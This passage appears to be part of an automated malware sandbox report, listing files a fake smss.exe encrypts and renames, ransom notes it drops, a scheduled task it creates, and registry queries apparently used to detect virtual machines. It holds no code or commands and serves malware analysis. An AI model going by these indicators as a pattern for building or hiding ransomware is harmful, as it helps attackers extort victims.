| File opened for modification | C:\Program Files\Microsoft Office\root\rsod\dcf.x-none.msi.16.x-none.tree.dat | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Templates\1033\ApothecaryResume.dotx | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.0.4.0_x64__8wekyb3d8bbwe\Assets\Icons\StickyNotesAppList.targetsize-32_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\MediumTile.scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\Persona.js | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-pl.xrm-ms.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\WPGIMP32.FLT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\NETWORK\PREVIEW.GIF | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File created | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.People_10.1909.12456.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_12105.1001.23.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.targetsize-96_altform-unplated.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21061.10121.0_x64__8wekyb3d8bbwe\GlassPixelShader.cso | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Assets\StoreLogo.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@fluentui\dom-utilities\lib-commonjs\IVirtualElement.js | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File created | C:\Program Files (x86)\INL Corpo Brovse\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-0FPF0.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-checkmark.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PROFILE\THMBNAIL.PNG.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\RICEPAPR.INF.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.24.10001.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest2-ppd.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.GetHelp_10.2008.32311.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GetHelpBadgeLogo.scale-125.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.MicrosoftSolitaireCollection_4.6.3102.0_neutral_split.scale-200_8wekyb3d8bbwe\Win10\MicrosoftSolitaireWideTile.scale-200.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe\Data\StreamingAssets\10296_ag_smoke_wisp.json | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_3.2106.14307.0_x64__8wekyb3d8bbwe\Assets\Store\LargeTile.scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Paint_10.2104.17.0_x64__8wekyb3d8bbwe\Assets\PaintAppList.targetsize-48_altform-lightunplated.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\components\DocumentCard\DocumentCardTitle.types.js | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Grace-ul-oob.xrm-ms.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\ro-RO\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\YourPhoneAppProxy\hu-HU\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.9.1942.0_x64__8wekyb3d8bbwe\Images\Square150x150Logo.scale-125_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Retail-ppd.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\PREVIEW.GIF.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Web Server Extensions\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\LargeTile.scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailBadge.scale-150.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-150.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_12105.1001.23.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreSmallTile.scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.21061.10121.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_10.3.41661.0_x64__8wekyb3d8bbwe\Assets\TipsBadgeLogo.scale-100.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File created | C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\Resources\de-de\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-125.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2103.6.0_x64__8wekyb3d8bbwe\Assets\NotepadAppList.targetsize-20_altform-unplated.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-pl.xrm-ms.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_MAK-pl.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime2019_eula.txt.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SnipSketchAppList.targetsize-24_altform-unplated.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_11.2104.2.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SnipSketchAppList.targetsize-32_altform-lightunplated.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\System32\Conhost.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFDB8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\oem2.inf | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI385.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFD7C4D27291BA150D.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI4075.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF5590309210AFF1AA.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9E9D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF152.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\inf\oem2.inf | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIB85.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI1B38.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI14DD.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI17EB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\Intel Rapid.job | C:\Users\Admin\AppData\Local\Temp\clpp.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF7CB3ABEA849AE37A.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f768dc5.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF76E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC0C8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f768dc5.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\WerFault.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\WerFault.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF82A5437AC0AFA3C8.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI1EE2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\UpperFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\System32\Conhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\System32\Conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | C:\Windows\system32\svchost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Phantom | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
